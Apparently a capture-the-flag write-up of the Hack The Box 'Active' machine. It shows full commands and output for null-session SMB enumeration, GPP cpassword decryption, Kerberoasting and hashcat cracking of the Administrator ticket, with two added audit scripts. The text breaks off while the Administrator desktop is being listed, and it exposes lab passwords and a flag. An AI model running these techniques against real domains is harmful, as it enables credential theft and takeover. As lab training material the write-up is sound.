Overview
The box starts with SMB null-auth enumeration, which reveals a Replication share containing a Groups.xml file with a GPP-encrypted password. Decrypting it yields credentials for SVC_TGS, which give read access to the Users share and the user flag. Kerberoasting the domain then returns a TGS ticket for Administrator that cracks offline, giving full admin access over SMB to read the root flag.
Enumeration
I will start with nmap for enumeration, as usual.
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/active]
└──╼ [★]$ nmap -sC -sV -v -oA init 10.129.7.87
Starting Nmap 7.94SVN ( https://nmap.org ) at 2026-06-02 06:45 PDT
NSE: Loaded 156 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 06:45
Completed NSE at 06:45, 0.00s elapsed
Initiating NSE at 06:45
Completed NSE at 06:45, 0.00s elapsed
Initiating NSE at 06:45
Completed NSE at 06:45, 0.00s elapsed
Initiating Ping Scan at 06:45
Scanning 10.129.7.87 [2 ports]
Completed Ping Scan at 06:45, 0.08s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 06:45
Completed Parallel DNS resolution of 1 host. at 06:45, 0.10s elapsed
Initiating Connect Scan at 06:45
Scanning 10.129.7.87 [1000 ports]
Discovered open port 139/tcp on 10.129.7.87
Discovered open port 53/tcp on 10.129.7.87
Discovered open port 445/tcp on 10.129.7.87
Discovered open port 135/tcp on 10.129.7.87
Discovered open port 49153/tcp on 10.129.7.87
Discovered open port 49155/tcp on 10.129.7.87
Discovered open port 636/tcp on 10.129.7.87
Discovered open port 464/tcp on 10.129.7.87
Discovered open port 49154/tcp on 10.129.7.87
Increasing send delay for 10.129.7.87 from 0 to 5 due to max_successful_tryno increase to 4
Discovered open port 49157/tcp on 10.129.7.87
Discovered open port 3268/tcp on 10.129.7.87
Discovered open port 389/tcp on 10.129.7.87
Discovered open port 3269/tcp on 10.129.7.87
Discovered open port 49152/tcp on 10.129.7.87
Discovered open port 88/tcp on 10.129.7.87
Discovered open port 593/tcp on 10.129.7.87
Discovered open port 49158/tcp on 10.129.7.87
Completed Connect Scan at 06:45, 17.06s elapsed (1000 total ports)
Initiating Service scan at 06:45
Scanning 17 services on 10.129.7.87
Completed Service scan at 06:46, 62.20s elapsed (17 services on 1 host)
NSE: Script scanning 10.129.7.87.
Initiating NSE at 06:46
Completed NSE at 06:47, 9.15s elapsed
Initiating NSE at 06:47
Completed NSE at 06:47, 4.80s elapsed
Initiating NSE at 06:47
Completed NSE at 06:47, 0.00s elapsed
Nmap scan report for 10.129.7.87
Host is up (0.17s latency).
Not shown: 983 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
53/tcp open domain Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid:
|_  bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2026-06-02 13:46:00Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49157/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49158/tcp open msrpc Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows
Host script results:
|_clock-skew: 2s
| smb2-security-mode:
|   2:1:0:
|_    Message signing enabled and required
| smb2-time:
|   date: 2026-06-02T13:46:57
|_  start_date: 2026-06-02T12:18:13
NSE: Script Post-scanning.
Initiating NSE at 06:47
Completed NSE at 06:47, 0.00s elapsed
Initiating NSE at 06:47
Completed NSE at 06:47, 0.00s elapsed
Initiating NSE at 06:47
Completed NSE at 06:47, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 94.36 seconds
As you can see, there are a lot of Active Directory ports, so this is a DC environment with the domain name active.htb. Let's add that to our hosts file:
sudo vi /etc/hosts
10.129.7.87 active.htb
Let's first try SMB with a guest account to see whether we can access it. The scan also leaks that the hostname is DC, so the FQDN would be DC.active.htb; add that to the hosts file as well, along with the bare hostname.
One odd thing I've seen in the nmap results is the DNS banner: it says the server is 2008, which is pretty old, and it leaks the DNS version, which might be vulnerable to something, so let's look it up:
53/tcp open domain Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid:
|_  bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
But I won't go down this rabbit hole right now.
First I tried a few simple usernames. One of them was an empty username and password, which somehow lets us list the shares, and we have READ on a share called Replication. Let's connect and see what is there.
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/active]
└──╼ [★]$ nxc smb 10.129.7.87 -u '' -p '' --shares
SMB 10.129.7.87 445 DC [*] Windows 7 / Server 2008 R2 Build 7601 x64 (name:DC) (domain:active.htb) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 10.129.7.87 445 DC [+] active.htb\:
SMB 10.129.7.87 445 DC [*] Enumerated shares
SMB 10.129.7.87 445 DC Share Permissions Remark
SMB 10.129.7.87 445 DC ----- ----------- ------
SMB 10.129.7.87 445 DC ADMIN$ Remote Admin
SMB 10.129.7.87 445 DC C$ Default share
SMB 10.129.7.87 445 DC IPC$ Remote IPC
SMB 10.129.7.87 445 DC NETLOGON Logon server share
SMB 10.129.7.87 445 DC Replication READ
SMB 10.129.7.87 445 DC SYSVOL Logon server share
SMB 10.129.7.87 445 DC Users
Replication Share
The Replication share looks like a synced copy of SYSVOL, so let's download all the files and take a look; maybe we find some GPP files or something similar.
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/active]
└──╼ [★]$ smbclient //10.129.7.87/Replication -U''%''
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Sat Jul 21 03:37:44 2018
.. D 0 Sat Jul 21 03:37:44 2018
active.htb D 0 Sat Jul 21 03:37:44 2018
5217023 blocks of size 4096. 279764 blocks available
smb: \> cd active.htb\
smb: \active.htb\> ls
. D 0 Sat Jul 21 03:37:44 2018
.. D 0 Sat Jul 21 03:37:44 2018
DfsrPrivate DHS 0 Sat Jul 21 03:37:44 2018
Policies D 0 Sat Jul 21 03:37:44 2018
scripts D 0 Wed Jul 18 11:48:57 2018
5217023 blocks of size 4096. 279764 blocks available
There is a cleaner way to download all the files, but this one will do. Among the results is a Groups.xml file, so let's take a look at it.
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/active]
└──╼ [★]$ smbclient //10.129.7.87/Replication -U''%'' -c 'recurse ON; mget *'
Get directory active.htb? y
Get directory DfsrPrivate? y
Get directory Policies? y
Get directory scripts? y
Get directory ConflictAndDeleted? y
Get directory Deleted? y
Get directory Installing? y
Get directory {31B2F340-016D-11D2-945F-00C04FB984F9}? y
Get directory {6AC1786C-016F-11D2-945F-00C04fB984F9}? y
Get file GPT.INI? y
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\GPT.INI of size 23 as active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/GPT.INI (0.1 KiloBytes/sec) (average 0.1 KiloBytes/sec)
Get directory Group Policy? y
Get directory MACHINE? y
Get directory USER? y
Get file GPT.INI? y
getting file \active.htb\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\GPT.INI of size 22 as active.htb/Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}/GPT.INI (0.0 KiloBytes/sec) (average 0.0 KiloBytes/sec)
Get directory MACHINE? y
Get directory USER? y
Get file GPE.INI? y
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\Group Policy\GPE.INI of size 119 as active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/Group Policy/GPE.INI (0.3 KiloBytes/sec) (average 0.1 KiloBytes/sec)
Get directory Microsoft? y
Get directory Preferences? y
Get file Registry.pol? y
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Registry.pol of size 2788 as active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Registry.pol (4.7 KiloBytes/sec) (average 1.5 KiloBytes/sec)
Get directory Microsoft? y
Get directory Windows NT? y
Get directory Groups? y
Get directory Windows NT? y
Get directory SecEdit? y
Get file Groups.xml? y
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\Groups.xml of size 533 as active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences/Groups/Groups.xml (1.2 KiloBytes/sec) (average 1.4 KiloBytes/sec)
Get directory SecEdit? y
Get file GptTmpl.inf? y
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Microsoft\Windows NT\SecEdit\GptTmpl.inf of size 1098 as active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Microsoft/Windows NT/SecEdit/GptTmpl.inf (2.5 KiloBytes/sec) (average 1.6 KiloBytes/sec)
Get file GptTmpl.inf? y
getting file \active.htb\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\MACHINE\Microsoft\Windows NT\SecEdit\GptTmpl.inf of size 3722 as active.htb/Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}/MACHINE/Microsoft/Windows NT/SecEdit/GptTmpl.inf (6.2 KiloBytes/sec) (average 2.4 KiloBytes/sec)
Looking at this Groups.xml, we see the following:
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/active/active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences/Groups]
└──╼ [★]$ cat Groups.xml
<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}"><Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\SVC_TGS"/></User>
</Groups>
As you can see, we got this cpassword:
<Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\SVC_TGS"/></User>
GPP
So what are cpassword and GPP?
cpassword is a Group Policy Preferences (GPP) encrypted password. Here's the background: when admins used GPP to set local account passwords via Group Policy, Windows stored them in Groups.xml inside SYSVOL (replicated here to the Replication share), readable by any domain user. Microsoft encrypted them with AES-256... but then published the static decryption key in their own documentation (see MS14-025; funny story, by mistake, wink-wink). So let's try to decrypt it.
And we got the password for the user SVC_TGS:
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/active/active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences/Groups]
└──╼ [★]$ gpp-decrypt edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ
GPPstillStandingStrong2k18
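The same decryption, plus the audit a defender would actually run over a SYSVOL copy, as an added example that is not part of the original post: it walks a downloaded Policies tree for the GPP XML files that can carry a cpassword attribute, reports each one, and decrypts the value with the key Microsoft published (AES-256-CBC, zero IV, base64 padding restored, UTF-16LE). The embedded SAMPLE_GROUPS_XML is the Groups.xml from the post; the file-name list, the directory walk and the decrypt helper are my own, and the decrypt step needs pycryptodome (it returns None without it).

```python
"""Audit a downloaded copy of a Policies tree (the Replication share above is
a DFSR replica of SYSVOL) for Group Policy Preferences files that still carry
a cpassword attribute, the MS14-025 issue. Added example, not from the post."""
import base64
import os
import xml.etree.ElementTree as ET

# Preference files that can carry a cpassword attribute
GPP_FILES = {"Groups.xml", "Services.xml", "ScheduledTasks.xml",
             "DataSources.xml", "Drives.xml", "Printers.xml"}

# The static AES-256 key Microsoft published in its GPP documentation
GPP_AES_KEY = bytes.fromhex(
    "4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a433b66c1b")

# The Groups.xml from the post, embedded so the example runs offline
SAMPLE_GROUPS_XML = """<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}"><Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\\SVC_TGS"/></User>
</Groups>
"""


def find_cpasswords_in_xml(xml_text, source="<string>"):
    """One finding per element that carries a cpassword attribute."""
    findings = []
    root = ET.fromstring(xml_text.encode("utf-8"))
    for elem in root.iter():
        cpass = elem.attrib.get("cpassword")
        if cpass is None:
            continue
        # Groups.xml uses userName; Services.xml uses accountName, ScheduledTasks.xml runAs
        account = (elem.attrib.get("userName") or elem.attrib.get("accountName")
                   or elem.attrib.get("runAs") or "")
        findings.append({"source": source, "account": account,
                         "action": elem.attrib.get("action", ""),
                         "cpassword": cpass})
    return findings


def audit_policies_tree(root_dir):
    """Walk a downloaded Policies tree (e.g. active.htb/Policies) for cpasswords."""
    findings = []
    for dirpath, _dirs, files in os.walk(root_dir):
        for name in files:
            if name in GPP_FILES:
                path = os.path.join(dirpath, name)
                with open(path, encoding="utf-8-sig") as fh:
                    findings.extend(find_cpasswords_in_xml(fh.read(), path))
    return findings


def pad_base64(cpass):
    """GPP strips the '=' padding from the base64 value; restore it."""
    return cpass + "=" * (-len(cpass) % 4)


def decrypt_cpassword(cpass):
    """AES-256-CBC with the published key and a zero IV, then UTF-16LE.
    Returns None when pycryptodome is not installed."""
    try:
        from Crypto.Cipher import AES
        from Crypto.Util.Padding import unpad
    except ImportError:
        return None
    cipher = AES.new(GPP_AES_KEY, AES.MODE_CBC, iv=b"\x00" * 16)
    plain = unpad(cipher.decrypt(base64.b64decode(pad_base64(cpass))), AES.block_size)
    return plain.decode("utf-16-le")


if __name__ == "__main__":
    for f in find_cpasswords_in_xml(SAMPLE_GROUPS_XML, "Groups.xml"):
        pw = decrypt_cpassword(f["cpassword"])
        print(f"{f['source']}: account={f['account']} action={f['action']} "
              f"password={'<install pycryptodome>' if pw is None else pw}")
```

Run it against the tree you pulled with `mget` by calling `audit_policies_tree("active.htb/Policies")`; on a real estate the fix is to remove any preference item that still sets a password (the MS14-025 patch only stops new ones being written) and rotate the accounts it names.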
SVC_TGS Users Share
As you can see, we can authenticate, and we got access to more shares, so let's look through them for anything useful.
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/active]
└──╼ [★]$ nxc smb 10.129.7.87 -u 'SVC_TGS' -p 'GPPstillStandingStrong2k18'
SMB 10.129.7.87 445 DC [*] Windows 7 / Server 2008 R2 Build 7601 x64 (name:DC) (domain:active.htb) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 10.129.7.87 445 DC [+] active.htb\SVC_TGS:GPPstillStandingStrong2k18
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/active]
└──╼ [★]$ nxc smb 10.129.7.87 -u 'SVC_TGS' -p 'GPPstillStandingStrong2k18' --shares
SMB 10.129.7.87 445 DC [*] Windows 7 / Server 2008 R2 Build 7601 x64 (name:DC) (domain:active.htb) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 10.129.7.87 445 DC [+] active.htb\SVC_TGS:GPPstillStandingStrong2k18
SMB 10.129.7.87 445 DC [*] Enumerated shares
SMB 10.129.7.87 445 DC Share Permissions Remark
SMB 10.129.7.87 445 DC ----- ----------- ------
SMB 10.129.7.87 445 DC ADMIN$ Remote Admin
SMB 10.129.7.87 445 DC C$ Default share
SMB 10.129.7.87 445 DC IPC$ Remote IPC
SMB 10.129.7.87 445 DC NETLOGON READ Logon server share
SMB 10.129.7.87 445 DC Replication READ
SMB 10.129.7.87 445 DC SYSVOL READ Logon server share
SMB 10.129.7.87 445 DC Users READ
At first I expected the Users share to hold some kind of user configuration, not the actual Users folder, but that is what it is, and it gives us the user flag.
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/active]
└──╼ [★]$ smbclient //10.129.7.87/Users -U'SVC_TGS'%'GPPstillStandingStrong2k18'
Try "help" to get a list of possible commands.
smb: \> ls
. DR 0 Sat Jul 21 07:39:20 2018
.. DR 0 Sat Jul 21 07:39:20 2018
Administrator D 0 Mon Jul 16 03:14:21 2018
All Users DHSrn 0 Mon Jul 13 22:06:44 2009
Default DHR 0 Mon Jul 13 23:38:21 2009
Default User DHSrn 0 Mon Jul 13 22:06:44 2009
desktop.ini AHS 174 Mon Jul 13 21:57:55 2009
Public DR 0 Mon Jul 13 21:57:55 2009
SVC_TGS D 0 Sat Jul 21 08:16:32 2018
5217023 blocks of size 4096. 279748 blocks available
smb: \> cd SVC_TGS\Desktop\
smb: \SVC_TGS\Desktop\> ls
. D 0 Sat Jul 21 08:14:42 2018
.. D 0 Sat Jul 21 08:14:42 2018
user.txt AR 34 Tue Jun 2 05:19:11 2026
5217023 blocks of size 4096. 279748 blocks available
smb: \SVC_TGS\Desktop\> cat user.txt
cat: command not found
smb: \SVC_TGS\Desktop\> get user.txt
getting file \SVC_TGS\Desktop\user.txt of size 34 as user.txt (0.1 KiloBytes/sec) (average 0.1 KiloBytes/sec)
smb: \SVC_TGS\Desktop\>
And here is the user flag:
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/active]
└──╼ [★]$ cat user.txt
f43bb4d3c4716ebae86e0835698fad52
Users Share as Administrator
Earlier I also tried this user against LDAP and it worked, so let's run rusthound and look at what this user can do.
We got 5 users and 49 groups, so let's take a look at that user.
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/active]
└──╼ [★]$ rusthound -d active.htb -u 'SVC_TGS' -p 'GPPstillStandingStrong2k18' -i 10.129.7.87
---------------------------------------------------
Initializing RustHound at 07:35:21 on 06/02/26
Powered by g0h4n from OpenCyber
---------------------------------------------------
[2026-06-02T14:35:21Z INFO rusthound] Verbosity level: Info
[2026-06-02T14:35:21Z INFO rusthound::ldap] Connected to ACTIVE.HTB Active Directory!
[2026-06-02T14:35:21Z INFO rusthound::ldap] Starting data collection...
[2026-06-02T14:35:24Z INFO rusthound::ldap] All data collected for NamingContext DC=active,DC=htb
[2026-06-02T14:35:24Z INFO rusthound::json::parser] Starting the LDAP objects parsing...
[2026-06-02T14:35:24Z INFO rusthound::json::parser::bh_41] MachineAccountQuota: 10
[2026-06-02T14:35:24Z INFO rusthound::json::parser] Parsing LDAP objects finished!
[2026-06-02T14:35:24Z INFO rusthound::json::checker] Starting checker to replace some values...
[2026-06-02T14:35:24Z INFO rusthound::json::checker] Checking and replacing some values finished!
[2026-06-02T14:35:24Z INFO rusthound::json::maker] 5 users parsed!
[2026-06-02T14:35:24Z INFO rusthound::json::maker] .//20260602073524_active-htb_users.json created!
[2026-06-02T14:35:24Z INFO rusthound::json::maker] 49 groups parsed!
[2026-06-02T14:35:24Z INFO rusthound::json::maker] .//20260602073524_active-htb_groups.json created!
[2026-06-02T14:35:24Z INFO rusthound::json::maker] 1 computers parsed!
[2026-06-02T14:35:24Z INFO rusthound::json::maker] .//20260602073524_active-htb_computers.json created!
[2026-06-02T14:35:24Z INFO rusthound::json::maker] 1 ous parsed!
[2026-06-02T14:35:24Z INFO rusthound::json::maker] .//20260602073524_active-htb_ous.json created!
[2026-06-02T14:35:24Z INFO rusthound::json::maker] 1 domains parsed!
[2026-06-02T14:35:24Z INFO rusthound::json::maker] .//20260602073524_active-htb_domains.json created!
[2026-06-02T14:35:24Z INFO rusthound::json::maker] 2 gpos parsed!
[2026-06-02T14:35:24Z INFO rusthound::json::maker] .//20260602073524_active-htb_gpos.json created!
[2026-06-02T14:35:24Z INFO rusthound::json::maker] 21 containers parsed!
[2026-06-02T14:35:24Z INFO rusthound::json::maker] .//20260602073524_active-htb_containers.json created!
RustHound Enumeration Completed at 07:35:24 on 06/02/26! Happy Graphing!
Nothing useful came back in the BloodHound data, so I decided to list all users, Kerberoast them, and also try AS-REP roasting. I will list all users first.
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/active]
└──╼ [★]$ nxc ldap 10.129.7.87 -u 'SVC_TGS' -p 'GPPstillStandingStrong2k18' --users
LDAP 10.129.7.87 389 DC [*] Windows 7 / Server 2008 R2 Build 7601 (name:DC) (domain:active.htb) (signing:None) (channel binding:No TLS cert)
LDAP 10.129.7.87 389 DC [+] active.htb\SVC_TGS:GPPstillStandingStrong2k18
LDAP 10.129.7.87 389 DC [*] Enumerated 4 domain users: active.htb
LDAP 10.129.7.87 389 DC -Username- -Last PW Set- -BadPW- -Description-
LDAP 10.129.7.87 389 DC Administrator 2018-07-18 12:06:40 0 Built-in account for administering the computer/domain
LDAP 10.129.7.87 389 DC Guest <never> 0 Built-in account for guest access to the computer/domain
LDAP 10.129.7.87 389 DC krbtgt 2018-07-18 11:50:36 0 Key Distribution Center Service Account
LDAP 10.129.7.87 389 DC SVC_TGS 2018-07-18 13:14:38 0
As you can see, we got a TGS hash for the Administrator account, so let's try to crack it.
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/active]
└──╼ [★]$ nxc ldap 10.129.7.87 -u 'SVC_TGS' -p 'GPPstillStandingStrong2k18' --kerberoasting users
LDAP 10.129.7.87 389 DC [*] Windows 7 / Server 2008 R2 Build 7601 (name:DC) (domain:active.htb) (signing:None) (channel binding:No TLS cert)
LDAP 10.129.7.87 389 DC [+] active.htb\SVC_TGS:GPPstillStandingStrong2k18
LDAP 10.129.7.87 389 DC [*] Skipping disabled account: krbtgt
LDAP 10.129.7.87 389 DC [*] Total of records returned 1
LDAP 10.129.7.87 389 DC [*] sAMAccountName: Administrator, memberOf: ['CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb', 'CN=Domain Admins,CN=Users,DC=active,DC=htb' , 'CN=Enterprise Admins,CN=Users,DC=active,DC=htb' , 'CN=Schema Admins,CN=Users,DC=active,DC=htb' , 'CN=Administrators,CN=Builtin,DC=active,DC=htb' ], pwdLastSet: 2018-07-18 12:06:40.351723, lastLogon: 2026-06-02 05:19:13.807343
LDAP 10.129.7.87 389 DC $krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb\Administrator*$5243e5fe8aab6d6b8712c11e95e9efc4$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
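What makes this roast worth cracking is visible in that output: the account with the SPN is a member of Domain Admins and the ticket came back as etype 23 (RC4), the layout hashcat mode 13100 expects. The following is an added example, not part of the original post, that triages `nxc ldap --kerberoasting` output the way I did by hand here: it pulls each hash, reads the etype from the header, maps it to the hashcat mode, and flags accounts whose memberOf puts them in a privileged group. The sample lines are constructed from the post's output layout with a placeholder ticket body; the group list and the etype-to-mode table are my own.

```python
"""Triage 'nxc ldap --kerberoasting' output: extract TGS-REP hashes, read the
etype, map it to a hashcat mode, and flag privileged roastable accounts.
Added example, not from the post; sample lines constructed from its layout."""
import re

# Constructed sample; the hex after the checksum is a placeholder ticket body
SAMPLE_OUTPUT = """\
LDAP 10.129.7.87 389 DC [*] Skipping disabled account: krbtgt
LDAP 10.129.7.87 389 DC [*] Total of records returned 1
LDAP 10.129.7.87 389 DC [*] sAMAccountName: Administrator, memberOf: ['CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb', 'CN=Domain Admins,CN=Users,DC=active,DC=htb', 'CN=Administrators,CN=Builtin,DC=active,DC=htb'], pwdLastSet: 2018-07-18 12:06:40.351723, lastLogon: 2026-06-02 05:19:13.807343
LDAP 10.129.7.87 389 DC $krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb\\Administrator*$5243e5fe8aab6d6b8712c11e95e9efc4$00112233445566778899aabbccddeeff
"""

# Groups whose members should never carry an SPN with a guessable password
PRIVILEGED_GROUPS = {"Domain Admins", "Enterprise Admins", "Schema Admins",
                     "Administrators", "Account Operators", "Backup Operators"}

# etype 23 (RC4-HMAC) is the header layout shown above; AES tickets (17/18)
# use a different hash header and are not parsed by this example
HASHCAT_MODES = {23: 13100}

RECORD_RE = re.compile(
    r"sAMAccountName: (?P<user>[^,]+), memberOf: \[(?P<groups>.*?)\], "
    r"pwdLastSet: (?P<pwdlastset>\S+ [^,\s]+)")
FIRST_CN_RE = re.compile(r"'CN=([^,']+)")   # first RDN of each quoted DN
HASH_RE = re.compile(
    r"\$krb5tgs\$(?P<etype>\d+)\$\*(?P<user>[^$]+)\$(?P<realm>[^$]+)"
    r"\$(?P<spn>[^*]+)\*\$[0-9a-fA-F]+\$[0-9a-fA-F]+")


def parse_kerberoast_output(text):
    """Return one finding per account for which a hash line was printed."""
    records, hashes = {}, {}
    for line in text.splitlines():
        rec = RECORD_RE.search(line)
        if rec:
            groups = FIRST_CN_RE.findall(rec.group("groups"))
            records[rec.group("user")] = {
                "groups": groups,
                "privileged": bool(PRIVILEGED_GROUPS & set(groups)),
                "pwdlastset": rec.group("pwdlastset"),
            }
            continue
        h = HASH_RE.search(line)
        if h:
            etype = int(h.group("etype"))
            hashes[h.group("user")] = {
                "hash": h.group(0),
                "etype": etype,
                "realm": h.group("realm"),
                "spn": h.group("spn"),
                "hashcat_mode": HASHCAT_MODES.get(etype),
            }
    empty = {"groups": [], "privileged": False, "pwdlastset": None}
    return [{"user": user, **info, **records.get(user, empty)}
            for user, info in hashes.items()]


def privileged_spn_accounts(findings):
    """Names of roastable accounts that sit in a privileged group."""
    return sorted(f["user"] for f in findings if f["privileged"])


def hashes_for_hashcat(findings, etype=23):
    """Lines to write to a hash file for 'hashcat -m 13100', one per line."""
    return [f["hash"] for f in findings if f["etype"] == etype]


if __name__ == "__main__":
    for f in parse_kerberoast_output(SAMPLE_OUTPUT):
        flag = "PRIVILEGED" if f["privileged"] else "standard"
        print(f"{f['user']}@{f['realm']} spn={f['spn']} etype={f['etype']} "
              f"hashcat=-m {f['hashcat_mode']} [{flag}] groups={f['groups']}")
```

The privileged flag is the point for a defender: a service account in Domain Admins with an SPN and a wordlist password is the whole finding, and the remediation is a long random password (or a gMSA) and dropping RC4 so tickets come back as AES, which is far slower to crack.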
As you can see, we cracked the Administrator hash. I won't even bother looking for WinRM or a shell; I will just grab the root flag from the share.
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/active]
└──╼ [★]$ hashcat -a 0 administrator.hash /usr/share/wordlists/rockyou.txt
hashcat (v7.1.2-382-g2d71af371) starting in autodetect mode
OpenCL API (OpenCL 3.0 PoCL 6.0+debian Linux, None+Asserts, RELOC, SPIR-V, LLVM 18.1.8, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
====================================================================================================================================================
* Device #01: cpu-haswell-Intel(R) Core(TM) i7-6700HQ CPU @ 2.60GHz, 1453/2907 MB (512 MB allocatable), 2MCU
Hash-mode was not specified with -m. Attempting to auto-detect hash mode.
The following mode was auto-detected as the only one matching your input hash:
13100 | Kerberos 5, etype 23, TGS-REP | Network Protocol
<SNIP>
$krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb\Administrator*$5243e5fe8aab6d6b8712c11e95e9efc4$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:Ticketmaster1968
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 13100 (Kerberos 5, etype 23, TGS-REP)
Hash.Target......: $krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb\Ad...ca51ce
Time.Started.....: Tue Jun 2 07:49:24 2026 (18 secs)
Time.Estimated...: Tue Jun 2 07:49:42 2026 (0 secs)
Kernel.Feature...: Pure Kernel (password length 0-256 bytes)
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#01........: 610.1 kH/s (3.63ms) @ Accel:1024 Loops:1 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 10539008/14344385 (73.47%)
Rejected.........: 0/10539008 (0.00%)
Restore.Point....: 10536960/14344385 (73.46%)
Restore.Sub.#01..: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#01...: Tiffany95 -> Thelittlemermaid
Hardware.Mon.#01.: Util: 88%
Started: Tue Jun 2 07:49:12 2026
Stopped: Tue Jun 2 07:49:44 2026
And we got the root flag:
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/active]
└──╼ [★]$ smbclient //10.129.7.87/Users -U'Administrator'%'Ticketmaster1968' -c 'ls Administrator\Desktop\'
. DR 0 Thu Jan 21 08:49:47 2021
.. DR 0 Thu Jan 21 08:49:47 2021
